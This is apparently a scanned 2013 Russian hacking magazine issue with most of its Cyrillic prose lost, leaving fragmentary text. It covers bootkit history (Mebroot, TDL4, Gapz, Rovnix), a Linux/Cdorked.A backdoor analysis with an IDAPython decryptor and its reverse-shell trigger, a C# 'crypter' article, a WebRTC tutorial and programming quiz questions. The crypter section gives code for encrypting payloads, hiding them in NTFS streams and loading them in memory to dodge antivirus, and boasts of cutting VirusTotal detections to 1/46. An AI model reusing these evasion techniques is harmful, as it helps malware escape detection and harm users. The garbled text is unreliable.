. Mebroot
Sinowal.
Mebroot
250 350 430
. 20 ,
20 . WinAPI, CreateFile \Device\


in the Wild o malware,

Windows, . -,
BootRoot ( Windows
2000/XP), Black
Hat USA 2005 (Derek Soeder)
(Ryan Permeh)
eEye Digital Security (eeye.com). - Vbootkit ( Vista RC1/
RC2) (Nitin Vipin
Kumar), NVlabs (nvlabs.in). Vbootkit
Black Hat Hack in the Box 2007 -

. 1. Mebroot

Harddisk0\DR0 (
\??\RealHardDiskN \??\PhysicalDriveN).
ring 3
( ring 0!) . , , Mebroot
version 1,
2008- , ,
disk.sys.
:
0 ;
60 ;
61 , ;
62 MBR 0;
(
650) .
Mebroot
(. . 1):
1. 2
0x7C00 0x0000.
2. 60 61
.
3. 13h
( 0x004D).
4. 0x7C00
MBR 62, .
5. 13h osloader ( ntldr)
.

102

Malware

6. osloader ( 60),
ntoskrnl.exe nt!IoInitSystem.
7. ntoskrnl.exe ( 61).
8. - ntoskrnl.exe
, .
Mebroot
,
,

. , NDIS
,
. ,
, disk.sys: IRP_MJ_READ
IRP_MJ_WRITE.

,
MBR.
(DGA Domain Generation
Algorithm).
, ,
Google.
.
,
DLL , (
services.exe). ,
%System% ,

, . DLL,
, HTML-
( iframe jscript) ( ), -
.
Mebroot ,
,
, .
, 2008
disk.sys,
(watchdog).
,
.
2009 Mebroot Windows Vista.


Mebroot
stoned-vienna.com
(Peter Kleissner), , ,
,
Stoned Bootkit, Black
Hat USA 2009. ,


-

09 /176/ 2013

.
Stoned Bootkit , ,
, , public lite
. , Stoned
Bootkit ,
. , ,
Whistler Bootkit. - Stoned v2 Alpha 3 20 2009
, 2010
. , C:\System
Volume Information NT-AUTHORITY\
SYSTEM.
2009
Hack In The Box Vbootkit
2.0, Windows
7 x64.

PatchGuard Driver Signing Policy,
,
.
GPL Vbootkit
Stoned Bootkit
,
-.
,
...
Stoned Bootkit,
stoned-vienna.com ,

malware. , ,
Mebroot
Ghost
Shadow, Microsoft
Ghodow. , Symantec 2010 , Trojan.Mebratix.B. -

Mebroot,
. ,
MBR Mebratix ,
mov, 00D0h
,

,
,
Mebratix. 59 (
) .
,

XOR,

.
17 .
explorer.exe
IRP- IRP_MJ_READ/
IRP_MJ_WRITE Disk.sys.
,
, .


hi-tech-
TDL,
TDL4 (aka Tidserv Olmarik ESET
?).
TDL: ,

(
, -, ...). ,
TDL
Tyler Durden, TDL Tyler Durden Loader (
Trojan
DownLoader ). , Tyler Durden
Comodo. ,
TDL3 Esage Lab TDL3
Dogma Million (bit.
ly/16P4jSu), ,
, , -

bootmanager
bootmanager

jmp.

jump-to-kernel-loader
Bootmanager

jmp.
kernel-loader
kernel-loader
jump-to-kernel

Kernel-loader

...

Kernel

. 2. EvilCore

09 /176/ 2013

, 2010 . TDL4

, 65 .
, 2010- TDL4
0.01, 2010- TDL4 0.02 x64 ,
malware , in
the Wild. Stoned Bootkit
x64 2011 .
Mebroot ,
TDL
. -, ,
,
,

WinAPI, CreateFile(), WriteFile(),
ReadFile(). TDL4 ( 8 )
.
RC4
ldr16, ldr32, ldr64, , ,
. MBR ldr16. ldr16
.
TDL4 kdcom.dll ( Int
13h kdcom.
dll),
. kdcom.dll ldr32 ldr64
. ldr32 ldr64 ,
.
TDL4 0.03,
2010-,
Task Scheduler, MS10-092.
Windows XP , .


2011
,
BIOS 13h.
MS-DOS,
: , BIOS
, ,

103

MBR

MBR

Partition table entry #1

Partition table entry #1

Partition table entry #2

Partition table entry #2

Partition table entry #3

Partition table entry #3

Partition table entry #4

Partition table entry #4



Malware


Partition entry
Existing

Active

Empty

. 3. , SST MBR

,
.
(Wolfgang Ettlinger) (Stefan
Viehbck) , , .
,
,
. , ,
NinjaCon 2011 EvilCore.
:
MBR EvilCore Symmetric Multi Processing,

;
, ;

,
, CPU;
CPU0 , CPU1
EvilCore .
:

jmp;
CPU0 , ;
;
.

. 2.

: task

WINDOWS
x64 Microsoft Windows Vista. XP x64, Windows Server 2003.
,
4 , 64- ,
. PatchGuard,
, :
GDT;
IDT;
SSDT;
, NTOSKRNL.EXE, NDIS.SYS, HAL.
DLL;
MSR- STAR/LSTAR/CSTAR/SFMASK.

, PatchGuard, ,
. (
), BSOD.
PatchGuard,
, (Driver Signing
Policy).
PatchGuard Driver Signing Policy ,
.

malware
bootkit ( boot rootkit).

Malware

104

MBR

BPB

VBR

09 /176/ 2013

IPL

NTFS

MBR

BPB

VBR

IPL

NTFS

malware

. 4. Gapz , 4 BPB

manager (!) . ,
, CPU
. :
. ,
malware,
EvilCore,
.

TDL
TDL . (
Pragma, )
TDL3 TDL4 SST
MaxSS (Olmasco ESET).
TDL ,
, , (TDL, TDSS
Tidserv). TDL4 ,
SST.
TDL3 based SST ( ) 2011 , SST TDL4 MBR. ,
,
, C&C
, ,
.
Microsoft
SST .
JPG,
imageshack.us. ,
livejournal.
com wordpress.com.
,

(. . 3). MBR
,
,
15 .
SST. TDL4,
,
15 , CRC32.
,
.
TDL4
Pihar,

TDL4.
,
. ,
, . , ,
[PurpleHaze] .
Pihar DLL hijacking
Adobe Flash Player.
ZeroAccess, (ncrypt.dll msimg32.dll).
2012 Damballa A New
Iteration of the TDSS/TDL4 Malware Using DGAbased Command-and-Control. ,
,
TDL.
(Pleiades),
, DGA C&C. ,
TDL4,

DGAv14.
kernelmode.info,
TDL4
( ldr16, ldr32, ldr64 ) .


Gapz. , TCP/IP-,
IPS/IDS !

,
PE-.
,
. Gapz , , ,

, .
,
. payload ( AES-256)
System Volume Information
hex-. FAT32,
FullFAT.
Gapz , , 2012-
MBR, VBR, . VBR NTFS
, BIOS Parameter
Block (BPB), .
BPB HiddenSectors, Initial Program Loader (IPL) ,
VBR.
IPL
NTFS .
4- HiddenSectors Gapz
, VBR IPL,
(. . 4). Mebratix (
MBR
).
, Gapz ,
,
-
. Gapz

09 /176/ 2013

2012
( ).



(

,
:). .
.).
Guntior
( 2010 ), 2013
Sophos,

.
, EXE,
DLL.
msimg32.dll %Temp%
, , DLL. %Temp%
HelpCtr.exe ( msimg32.dll),
Windows.
HelpCtr.exe PATH , %Temp%
, %System%. HelpCtr.ex
WM_HOTKEY Shell_TryWnd ( <Win +
F1>). , msimg32.dll HelpCtr.exe (
dll hijacking) .
%Temp% , PATH
.
, . - Guntior
Stoned Bootkit (

). Mebroot
IRP_MJ_READ IRP_MJ_WRITE
disk.sys.


Carberp. .
()
() Carberp.
. 5 (2
)
. . Carberp
bootkit-
2011 , Rovnix. , Stoned Sinowal.
Rovnix 2011 ,

Mayachok (Cidox). Rovnix
MBR, NTFS,
Volume Boot Record (VBR).
Mayachok 32-,
64- Rovnix.
.
( -

), ,
. ,

. aPlib .


VBR. Mayachok ,
, , .
Carberp . 2012 ESET Rovnix,
,
VBR,
RC6 .
, VFAT.
Rovnix VBR. , Zeus (, Carberp ),
boot-
.

?
MBR- VBR-
UEFI. , BIOS (Mebromi
2011 ), , BIOS

. UEFI, . , UEFI
,
.
(Andrea Allievi),
ITSEC -,
2012 Windows 8, UEFI-
. ITSEC UEFI UEFI
bootloader .
Kernel Patch Protection Driver
Signature Enforcement . 2013 HITB (Hack in the
Box) (Sbastien Kaczmarek)
QuarksLab Dreamboot: A
UEFI Bootkit Windows 8. Dreamboot github.com.
,
SecureBoot, Microsoft
.
Windows 8
, UEFI
( -,
), ,

, .
( , , , ), ,
(
, -
),

.

105

BIOS
BIOS
UEFI, ,

(Intel Boot
Initiative) 1998 .
,
BIOS,
16- ,
1 ,
2 ,
.
UEFI
.
BIOS, asm, UEFI .

,

.

GUID Partition Table (GPT),

UEFI ( Linux
64- Windows,
Vista). UEFI
SecureBoot,

,
.
SecureBoot ,
. Linux , Microsoft

Windows (
Microsoft
,
).

Windows 8

SecureBoot , ARM,
.
,
? ,
SecureBoot , OEM-
Microsoft,
,
, Win,
. ,
Linux
Microsoft. , .

106

Malware

09 /176/ 2013


LINUX
Linux/Cdorked.A
, Adobe Oracle, , Linux. -. , .
-?

,
Malware Researcher,
ESET

, , . - ,
.
- ,
. . -,
- ,
. -,
- , , .

,
Linux.

LINUX/CDORKED.A

ESET Sucuri -

2013 . - Apache,
lighttpd nginx.
Linux/Cdorked.A
. ,
Blackhole.
Linux/Cdorked.A ELF-
-,
. . , -, root-,

root- . ,
, cPanel .
, Linux/Cdorked.A , .

09 /176/ 2013

Linux

107




: pastebin.com/
zNhD7rai

64- ELF- Apache. ,


. , , , ,
ob87E874aD44B47B8544955.
, ,
. ,
. , , XOR- -.
, IDAPython.
:

# -*- coding: cp1251 -*from idaapi import *


from idautils import *
def decrypt_str(offset, size):
#
key = (0x27, 0xA4, 0xE2, 0xDA, 0xDA, 0xF1,
0x83, 0xB5, 0x1E, 0x3D, 0xA7, 0xF6, 0xC9,
0xE6, 0x23, 0x9C, 0xDF, 0xC8, 0xA2, 0xE5, 0xA,
0x60, 0xE0, 0x5F)
string = bytearray(size)

reverse shell

for i in range(size):
b0 = Byte(offset + i) ^ key[i % len(key)]
string[i] = b0 & 0xFF
return str(string)
def main():
# 0x043B8FE0x43BCE0
#
#
code_offset = 0x043B8FE
#
xlen = 0x76B480
strings = []
# ,
#
while(Byte(xlen)):
#
# lea rax, offset string
while (GetMnem(code_offset) != 'lea' or
GetOpType(code_offset, 0) != idaapi.o_reg or
GetOpType(code_offset, 1) != idaapi.o_mem):
code_offset = NextHead(code_offset)
#
#
str = decrypt_str(GetOperandValue

108

Malware

09 /176/ 2013


?
,
Linux/Cdorked.A,
http://server.ru/favicon.iso.

.

,
debsums Debian Ubuntu,
rpm verify RPM-based Linux .

-. shared memory, .


shared memory

(code_offset, 1), Byte(xlen))


strings.append(str)
code_offset = NextHead(code_offset)
xlen += 1
# ,
# ,
func = LocByName('decrypt_strings')
#
for addr in CodeRefsTo(func, True):
# mov edi, ID,
# ID
while (GetMnem(addr) != 'mov' or
GetOpType(addr, 0) != idaapi.o_reg or
GetOperandValue(addr, 0) != 7):
addr = PrevHead(addr)
#
#
MakeComm(addr, strings
[GetOperandValue(addr, 1)])
if __name__ == '__main__':
main()


,
. reverse shell,
, GET HTTP- .
/favicon.iso ( iso, ico!).

GET_BACK;HOST;PORT, HOST PORT IP- ,
reverse shell.
IP- X-Forwarded-For
X-Real-IP XOR-, . hex-.
, ,
HTTP- . /favicon.iso - -.
, http://google.com/.
.
POST- HTTP- URL. , ,
reverse shell. Cookie SECID=.
Etag HTTP-.
:
L1, D1 / URL,
;
L2, D2 / IP- ;
L3, D3 / User-Agent ;

L4, D4 / User-Agent ;
L6, D6 / IP- ;
L7, D7 ;
L8, D8 / IP- ;
L9, D9 / Accept-Language
;
LA, DA
;
ST ;
DU IP- ;
T1 .

, .

,
.
IP- , .
,
, .
shared
memory 6 .
-,
. , Linux/Cdorked.A
, nginx lighttpd: goo.gl/5iL5E.

, Sucuri
shared memory,
. , , Internet
Explorer Firefox, , , iPhone iPad.
, HTTP- : Accept-Language, Accept-Encoding, Referrer,
User-Agent. , Cookie :
GIDID=6745609876567 ; path=/; expires=Friday, 31-Dec-2030
23:59:59 GMT. -, Cookie
, Referrer : *adm*, *webmaster*, *submit*, *stat*,
*mrtg*, *webmin*, *cpanel*, *memb*, *bucks*, *bill*, *host*,
*secur*, *support*.

. ,
Linux , .

09 /176/ 2013

109

XXI

Dywar
mrdywar@gmail.com

, , . ,
, -
. , ? , 2013
! proof-of-concept. !
. , .
Native , C++, calc.exe.
.NET CLR, C#,
.
, .
.
, .

:
Static (- );
Polymorph (- ).

:
Scantime ( HDD, );
Runtime ( ).

), , Test.cs
.
, , , ...

SCANTIME CRYPTER
, Scantime, HDD. Visual Studio
Csharp_ScanTime_Temp.rar. Form1.cs GUI-
(. 1),
.
Crypt.
System.Resources.
ResourceWriter("res.resources"), AddResource
file
RC4
RC4KEY. CodeDom, CompilerParameters (GenerateExecutable
= true, OutputAssembly = "File.exe", ReferencedAssemblies.Add("System.dll"),
EmbeddedResources.Add("res.resources"), CompilerOptions += "/t:winexe").
CompilerResults. HDD, File.
Delete("res.resources") , ,
CodeDom.Compiler.CompilerError.
, , , , , . .

Temp
Static- C Sharp,
Scantime Runtime. , Visual
Studio Express Microsoft,
2010.
DVD, .
Source (

,
%temp%. , Source Csharp_ScanTime_Temp.rar. ,
( ) ,
. ResourceManager, RC4KEY.

110

09 /176/ 2013

CompilerResults, .
.NET Reflector ,
. .


Csharp_RunTime_Simple.rar, Source.
. 1. .
!


b, ,
. .
Path.GetTempPath(),
string "nameA", Your_File.exe. ,
( ), ! WriteAllBytes File, .
Process.Start(nameA), .
,
.
native .NET.

NTFS-
Csharp_SanTime_NTFS.
rar, Source. ,
,
. , API-
.
:
1. .
,
, : JustTempFile.
tmp:YourFile.exe.
2. PInvokeWin32API.
WriteAlternateStreamBytes(nameA, NTFSName, b),
,
, .
3. Process.Start(), , Windows 7
( ).
API, StartNTFSProcess.
Start(nameA + ":" + NTFSName),
.
4. File.
Delete(nameA), ,
%temp% . ,
.
HDD. native NTFS.
AlternateStreamView.

static void Main() {


byte[] betyFile = RC4EncryptDecrypt(Convert.
FromBase64String("$FILE$"), "RC4KEY");
System.Reflection.Assembly.Load(betyFile).EntryPoint.
Invoke(null, null);
}
, HDD . , !
? ... , , , . , ...


Csharp_RunTime_Hard.rar .
-
. , ! -.
: , ,
, .
Source.
, . :

Globals.randomPasswd = RandomPassNewGlobal();
byte[] filebytes = RC4EncryptDecrypt(System.IO.File.
ReadAllBytes(textBox1.Text), Globals.randomPasswd);
int a = filebytes.Length / 4;
byte[] partofthebytes = new byte[a];
Array.Copy(filebytes, 0, partofthebytes, 0, a);
Globals.partOneHash = md5Hash
(Convert.ToBase64String(partofthebytes));
Globals.partOneKey = RandomPassNew();
partofthebytes = RC4EncryptDecrypt
(partofthebytes, Globals.partOneKey);
Globals.filePartOne = Convert.ToBase64String(partofthebytes);
public static string RandomPassNew() {
Random rnd = new Random();
uint rOne = (uint) rnd.Next(52345, 52348);
uint rTwo = (uint) rnd.Next(39327, 39329);
uint rMul = rOne * rTwo;
return rMul.ToString();
}
-, , 4 ( ). , ,
Array.Copy() . MD5-

RUNTIME CRYPTER


HDD.
Base64- Source Crypt.
.NET-. :

WARNING

byte[] filebytes = RC4EncryptDecrypt(System.


IO.File.ReadAllBytes(textBox1.Text), "RC4KEY");
string NewSource = Properties.Resources.Source;
NewSource = NewSource.Replace("$FILE$", Convert.
ToBase64String(filebytes));
,
string, Source,
, Replace,
. CodeDom.Compiler.

. 2. temp NTFS-


. ,


,

.

09 /176/ 2013

111

. 3.

Convert.ToBase64String() . .
, :

Thread threadpartone = new Thread(ThreadFourMethod);


threadpartone.Start();
private static void ThreadFourMethod() {
string partFourHash = "$partFourHash$";
byte[] ByteFileFour = Convert.
FromBase64String("$baseFour$");
while (true) { string rndpasswd = RandomPassNew();
byte[] befoRndDecOne =
RC4EncryptDecrypt(ByteFileFour, rndpasswd);
string bufferForParts = md5Hash(Convert.
ToBase64String(befoRndDecOne));
if (partFourHash == bufferForParts) {
bytefromthreadfour = befoRndDecOne;
break;
}
}
}
Array.Reverse(bytefromthreadtwo);
Array.Copy(bytefromthreadone, 0, FileHere, 0,
bytefromthreadone.Length);
System.Reflection.Assembly.Load(RC4EncryptDecrypt
(testa, (testb + testccc).ToString())).EntryPoint.
Invoke(null, null);

. 4. VirusTotal

,
.
, , , .
,
Array.Reverse()
Array.Copy(). , , , System.Reflection.Assembly.Load(),
( , ).

VIRUSTOTAL
ReverseSocksBot, .NET, VT ( ). 26/46 (. 4).
.
1/46 (. 5), !

.NET ,
Framework .
, ( ) . :
!

. 5. VirusTotal

112

09 /176/ 2013

WebRTC +


alykoshin@gmail.com,
ligne.ru


: Java,
ActiveX, Adobe Flash...

,
(
- ?) , ,
. ? !

WebRTC -
- WebRTC :
(, ) navigator.
getUserMedia, MediaStream;
peer-to-peer , ,
RTCPeerConnection (
- ) RTCDataChannel (
).

?
,
WebRTC . Chrome/Chromium,
WebRTC , 22 Firefox
. ,
API . Chromium 28.
-.

MediaStream
WebRTC MediaStream. . Chrome
navigator.webkitGetUserMedia() ( ,
, Firefox navigator.
mozGetUserMedia()).
.
, .
callback-: /, .
HTML- rtctest1.html <video>:

<!DOCTYPE html>
<html>
<head><title>WebRTC - </title>
<style>
video { height: 240px; width: 320px;
border: 1px solid grey; }
</style>
</head>
<body>
<button id="btn_getUserMedia"
onclick="getUserMedia_click()">
getUserMedia
</button>
<br>
<video id="localVideo1" autoplay="true"></video>
<script></script>
</body>
</html>

geishaboy500@flickr.com

IP- : SIP,
, H.323 MGCP,
Jabber/Jingle ( Gtalk), Adobe RTMP*
, , Skype. WebRTC, Google, IP- -,
, Skype. WebRTC
,
, ( ,
, ).

09 /176/ 2013


<script> </script> HTML-
:

113

var localStream = null;


SDP

getUserMedia
:

ICE

SDP
(SRTP)

RTCPeerConnection

RTCPeerConnection
P)

RT

// ,
var streamConstraints = { "audio" : true,
"video" : true };

ICE

S
(

(SR

TP

var streamConstraints = {
"audio": true,
"video": {
"mandatory": { "maxWidth"
: "320",
"maxHeight"
: "240",
"maxFrameRate" : "5" },
"optional": []
}
};
getUserMedia callback-,
:

function getUserMedia_success(stream) {
console.log("getUserMedia_success():", stream);
// HTML- <video>
localVideo1.src = URL.createObjectURL(stream);
//
//
localStream = stream;
}
callback- ,

function getUserMedia_error(error) {
console.log("getUserMedia_error():", error);
}
getUserMedia

function getUserMedia_click() {
console.log("getUserMedia_click()");
navigator.webkitGetUserMedia(streamConstraints,
getUserMedia_success, getUserMedia_error);
}
, ,
. , :

NavigatorUserMediaError {code: 1,
PERMISSION_DENIED: 1}"
,

.
, Chrome,
Settings (), Show advanced settings
( ), Privacy
( ), Content ( ).

RTCPeerConnection

STUN

TURN

Firefox Opera
.
HTTP .
HTTPS ,
.

.

RTCMediaConnection
RTCMediaConnection , . , (SDP), ICE-
NAT ( STUN)
TURN-.
RTCMediaConnection . SRTP.
RTCMediaConnection , ,
.
. , RTCMediaConnection ( , ).

OFFER-ANSWER
offer/answer
(/; RFC3264: tools.ietf.org/html/rfc3264) SDP
(Session Description Protocol). SIP.
: Offerer , SDP- (Offer SDP), Answerer , SDP-
(Answer SDP).
(, SIP -,
), SDP .
RTCMediaConnection,
:
, , Offer, SDP ( SIP),
,
. .
Answer, SDP .
ICE, .
.

OFFER
Offer .
. createOffer()
callback-, ( ,
).
: onicecandidate ICE- onaddstream .
. HTML <button>
:

114

09 /176/ 2013

<button id="btn_createOffer"
onclick="createOffer_click()">createOffer</button>

// pc2_receivedOffer(desc);
}

<video> ( ):

callback-,

<br>
<video id="remoteVideo1" autoplay=true></video>
JavaScript-
RTCPeerConnection:

function pc1_createOffer_error(error){
console.log("pc1_createOffer_success_error(): error:", error);
}
callback-, ICE-
:

var pc1;
RTCPeerConnection STUN/
TURN-. . ;
, .

var servers = null;

function pc1_onicecandidate(event){
if (event.candidate) {
console.log("pc1_onicecandidate():\n"+
event.candidate.candidate.replace
("\r\n", ""), event.candidate);
// ,
// pc2.addIceCandidate (new
// RTCIceCandidate(event.candidate));
}

Offer SDP

var offerConstraints = {};


createOffer() callback-,
Offer

}
callback-
( , RTCPeerConnection):

function pc1_createOffer_success(desc) {
console.log("pc1_createOffer_success(): \ndesc.sdp:\
n"+desc.sdp+"desc:", desc);
// RTCPeerConnection, Offer SDP
// setLocalDescription
pc1.setLocalDescription(desc);

function pc1_onaddstream(event) {
console.log("pc_onaddstream()");
remoteVideo1.src = URL.createObjectURL(event.stream);
}

// Answer SDP,
// setRemoteDescription.
// ,

createOffer RTCPeerConnection, onicecandidate onaddstream Offer


SDP, createOffer():

JavaScript

MICROSOFT CU-RTC-WEB
Microsoft Microsoft,
Google
CU-RTC-Web (bit.ly/
Z63rre). IE, ,
,
Skype Microsoft Google, ,

Skype. Google ;
- , IP
, ,
.


,

. .



Offer,
SDP,

Offer SDP

pc : RTCPeerConnection
addStream()

createOffer()
offer

Offer SDP

pc : RTCPeerConnection

setLocalDescription(offer)
setRemoteDescription(offer)

Offer SDP

createAnswer()
Answer SDP

answer
setLocalDescription(answer)
setRemoteDescription(answer)

ICE-

onicecandidate(candidate)
addlceCandidate(candidate)

ICE-

onicecandidate(candidate)
addlceCandidate(candidate)

onaddstream(stream)

onaddstream(stream)

SRTP


RTCPeerConnection

115

09 /176/ 2013

function createOffer_click() {
console.log("createOffer_click()");
// RTCPeerConnection
pc1 = new webkitRTCPeerConnection
(servers);
// Callback-
// ICE-
pc1.onicecandidate =
pc1_onicecandidate;

TURN-
ICE- : host, srflx relay. Host ,
, srflx , (STUN), relay
TURN-. NAT, host , srflx
NAT relay
.
ICE- host, 192.168.1.37 udp/34022:

a=candidate:337499441 2 udp 2113937151 192.168.1.37 34022 typ host generation 0


// Callback-,
// // .
pc1.onaddstream = pc1_onaddstream;
//
// (, )
pc1.addStream(localStream);
//
// Offer
pc1.createOffer(
pc1_createOffer_success,
pc1_createOffer_error,
offerConstraints
);
}

STUN/TURN-:

var servers = { "iceServers": [


{ "url": "stun:stun.stunprotocol.org:3478" },
{ "url": "turn:user@host:port", "credential": "password" }
]
};
STUN- . , , : www.
voip-info.org/wiki/view/STUN. , . TURN-, STUN, . , TURN ,
, . TURN- (, IP). , ,
rfc5766-turn-server (code.google.com/p/rfc5766-turn-server). Amazon EC2.
TURN , , , ,
, - WebRTC Skype
(NAT) , .

rtctest2.html,
,
, .
,
. , SDP
, , ,
ICE- .

'OfferToReceiveVideo' : true }
};

ANSWER SDP ICE-


Offer SDP, ICE- RTCPeerConnection setRemoteDescription Offer
SDP addIceCandidate ICE-, ;
Answer SDP ICE-. Answer
SDP Offer; , createOffer,
createAnswer RTCPeerConnection setRemoteDescription
Offer SDP, .
HTML:

Offer
RTCPeerConnection Answer Offer:

function pc2_receivedOffer(desc) {
console.log("pc2_receiveOffer()", desc);
// RTCPeerConnection
//
pc2 = new webkitRTCPeerConnection(servers);

<video id="remoteVideo2" autoplay=true></video>


//
// ICE-
pc2.onicecandidate = pc2_onicecandidate;

RTCPeerConnection :

var pc2;
//
// HTML <video>
pc2.onaddstream = pc_onaddstream;

Offer Answer SDP


Answer SDP Offer. callback-,
Answer, Offer,
Answer SDP :

// (
// ,
// )
pc2.addStream(localStream);

function pc2_createAnswer_success(desc) {
pc2.setLocalDescription(desc);
console.log("pc2_createAnswer_success()", desc.sdp);
pc1.setRemoteDescription(desc);
}

// , RTCPeerConnection ,
// Offer SDP (
// )
pc2.setRemoteDescription( new
RTCSessionDescription(desc));

Callback-, Answer, Offer:

function pc2_createAnswer_error(error) {
console.log('pc2_createAnswer_error():', error);
}

//
// Answer
pc2.createAnswer(
pc2_createAnswer_success,
pc2_createAnswer_error,
answerConstraints
);

Answer SDP:

var answerConstraints = {
'mandatory': { 'OfferToReceiveAudio' : true,

116

09 /176/ 2013

localVideo1.src = ""; localStream.stop(); localStream = null;


// HTML// <video>, ,
// = null
remoteVideo1.src = ""; pc1.close(); pc1 = null;
remoteVideo2.src = ""; pc2.close(); pc2 = null;

getUserMedia
MediaStream, :

video: {
mandatory: { chromeMediaSource: 'screen'
optional: []
}};

}
},

:
getUserMedia() chrome://
flags/,chrome://flags/;
HTTPS (SSL origin);
;
.

WEBRTC
WebRTC ,
. JsSIP (jssip.net) , SIP-, Asterisk
Camalio. PeerJS (peerjs.com) P2P-
, Holla (wearefractal.com/holla) , P2P- .

rtctest3.html, .

RTCPeerConnection . Offer Answer SDP, ICE-
,
-
, -.

Node.js socket.io
SDP ICE-
RTCPeerConnection , Node.js socket.io.
Node.js ( Debian/Ubuntu) : bit.ly/jTdcri.

$ sudo apt-get install python-software-properties python


g++ make
$ sudo add-apt-repository ppa:chris-lea/node.js
$ sudo apt-get update
$ sudo apt-get install nodejs
: bit.ly/
egLfzu. :

$ echo "sys=require('util'); sys.puts('Test message');" >


nodetest1.js
$ nodejs nodetest1.js
Offer SDP , pc1_createOffer_
success() :

npm (Node Package Manager) socket.io express:

pc2_receivedOffer(desc);

$ npm install socket.io express

ICE-, ICE- pc1_


onicecandidate() :

, nodetest2.js :

pc2.addIceCandidate(new
RTCIceCandidate(event.candidate));
ICE- :

function pc2_onicecandidate(event) {
if (event.candidate) {
console.log("pc2_onicecandidate():",
event.candidate.candidate);
pc1.addIceCandidate(new RTCIceCandidate(event.candidate));
}
}
allback- :

function pc2_onaddstream(event) {
console.log("pc_onaddstream()");
remoteVideo2.src = URL.createObjectURL(event.stream);
}

$ nano nodetest2.js
var app = require('express')()
, server = require('http').createServer(app)
, io = require('socket.io').listen(server);
server.listen(80); // 80
//
app.get('/' function (req, res) {
// HTML-
res.sendfile(__dirname + '/nodetest2.html');
});
//
io.sockets.on('connection', function (socket) {
//
socket.emit('server event', { hello: 'world' });
//
//
socket.on('client event', function (data) {
console.log(data);
});
});
nodetest2.html :


HTML

<button id="btnHangup" onclick="btnHangupClick()">Hang Up


</button>

function btnHangupClick() {
// HTML- <video>,
// , = null

$ nano nodetest2.html
<script src="/socket.io/socket.io.js"></script>
<script>
// URL - ( ,
// )
var socket = io.connect('/');
socket.on('server event', function (data) {
console.log(data);
socket.emit('client event', { 'name': 'value' });

09 /176/ 2013

});
</script>
:

$ sudo nodejs nodetest2.js


http://localhost:80 ( 80- ) . , JavaScript
.

RTCPEERCONNECTION
-

(rtcdemo3.html)
rtcdemo4.html. <head> socket.io:

<script src="/socket.io/socket.io.js"></script>
JavaScript -:

var socket = io.connect('http://localhost');


-:

function createOffer_success(desc) {
...
// pc2_receivedOffer(desc);
socket.emit('offer', desc);
...
}
function pc2_createAnswer_success(desc) {
...
// pc1.setRemoteDescription(desc);
socket.emit('answer', desc );
}
function pc1_onicecandidate(event) {
...
// pc2.addIceCandidate(new RTCIceCandidate
// (event.candidate));
socket.emit('ice1', event.candidate);
...
}
function pc2_onicecandidate(event) {
...
// pc1.addIceCandidate(new RTCIceCandidate
// (event.candidate));
socket.emit('ice2', event.candidate);
...
}
hangup()
-:

117

socket.on('ice2', function (data) {


console.log("socket.on('ice2'):", data);
pc1.addIceCandidate(new RTCIceCandidate(data));
});
socket.on('hangup', function (data) {
console.log("socket.on('hangup'):", data);
remoteVideo2.src = ""; pc2.close(); pc2 = null;
});


nodetest2.js
rtctest4.js io.sockets.on('connection', function (socket) { ...
} :

// 'offer',
// ,
//
socket.on('offer', function (data) {
socket.emit('offer', data);
//
// , :
// soket.broadcast.emit('offer', data);
});
socket.on('answer', function (data) {
socket.emit('answer', data);
});
socket.on('ice1', function (data) {
socket.emit('ice1', data);
});
socket.on('ice2', function (data) {
socket.emit('ice2', data);
});
socket.on('hangup', function (data) {
socket.emit('hangup', data);
});
, HTML-
:

// res.sendfile(__dirname + '/nodetest2.html');
res.sendfile(__dirname + '/rtctest4.html');
:

$ sudo nodejs rtctest4.js



, . , , ,
. . , ,
STUN/TURN- .

function btnHangupClick() {
...
// remoteVideo2.src = ""; pc2.close(); pc2 = null;
socket.emit('hangup', {});
}
:

socket.on('offer', function (data) {


console.log("socket.on('offer'):", data);
pc2_receivedOffer(data);
});
socket.on('answer', function (data) {
console.log("socket.on('answer'):", data);
pc1.setRemoteDescription( new RTCSessionDescription(data));
});
socket.on('ice1', function (data) {
console.log("socket.on('ice1'):", data);
pc2.addIceCandidate(new RTCIceCandidate(data));
});

, ,
, pc1 pc2
RTCPeerConnection
<video>, . , WebRTC,
( ) , . ,
. ,
: simpl.info getUserMedia (bit.ly/YdlpBv), simpl.info
RTCPeerConnection (bit.ly/18a1L0v), WebRTC Reference App (bit.ly/Wjb0cA).
, WebRTC
,
, . WebRTC , . , , .
() (bit.ly/16zeiuW), (bit.ly/ZqvaxR), P2P- (https://peercdn.com) RTCDataChannel.

118

09 /176/ 2013


lozovsky@glc.ru

EMBARCADERO
,
.
,
, RAD Studio 4 100
. : ,
Delphi, C++ Builder FireMonkey
iOS,
! , Embarcadero
:). !

B = class(A)
public
procedure Fun;
end;
procedure A.Fun;
begin
ShowMessage('A');
end;
procedure B.Fun;
begin
ShowMessage('B');
end;

1
, :

procedure TForm1.Button1Click
(Sender: TObject);
begin
try
try
StrToInt('some number');
ShowMessage('1');
except
ShowMessage('2');
end;
finally
ShowMessage('3');
end;
ShowMessage('4');
end;

//
var
refA : A;
refB : B;
begin
refA := B.Create;
refB := refA;
refA.Fun;
refB.Fun;
//
end;

?
: 2, 3, 4. 1 ,
.
2 except.
finally .
4 ,
.

2
:

A = class
public
procedure Fun;
end;

? ()
?
?
,
B?

: refB :=
refA. : refB := refA as B
refB := B(A).
,
B = class(A).
A B.

B, virtual procedure Fun A override
procedure B B.

3
:

IMyInterface = interface
end;
TMyClass = class(TInterfacedObject,
IMyInterface)
public
destructor Destroy;
end;
destructor TMyClass.Destroy;
begin
ShowMessage('destructor');
end;
procedure TForm1.Button1Click
(Sender: TObject);
var
inf : IMyInterface;
begin
inf := TMyClass.Create;
end;
,
destructor?
: override .
, Free !

4
TTable.
?
1. Table1.FieldByName('id').Value := 10;
2. Table1.FieldByName('id').Value := 'ten';
3. Table1.FieldByName('id').AsInteger := 10;
4. Table1.Fields[0].AsString := 10;
5. Table1['id'] := 10;
6. Table1['id'] := 'ten';
7. Table1.Fields['id'] := 'ten';
8. Table1.Fields['id'] := 10;
9. Table1.Fields.FieldByName('id').AsString := 10;
10. Table1.FieldsById('id').Value := 10;
11. Table1.Fields.FieldByName('id').AsInteger := 10;
: 1, 2, 3, 5, 6,
11. : 4, 7,
8 9 , 10 .

09 /176/ 2013

119

IT-, !
- ,
, . lozovsky@
glc.ru . , , . , , , .





,
?

std::map<int, int>myMap;
// 1
myMap.insert(std::pair<int,
int>(10, 20));
// 2
myMap.insert(std::make_pair(30, 40));


Method1(), Method2() ?
,
.

class CA
{
public:
virtual ~CA() {}
void Method1() { std::cout<<
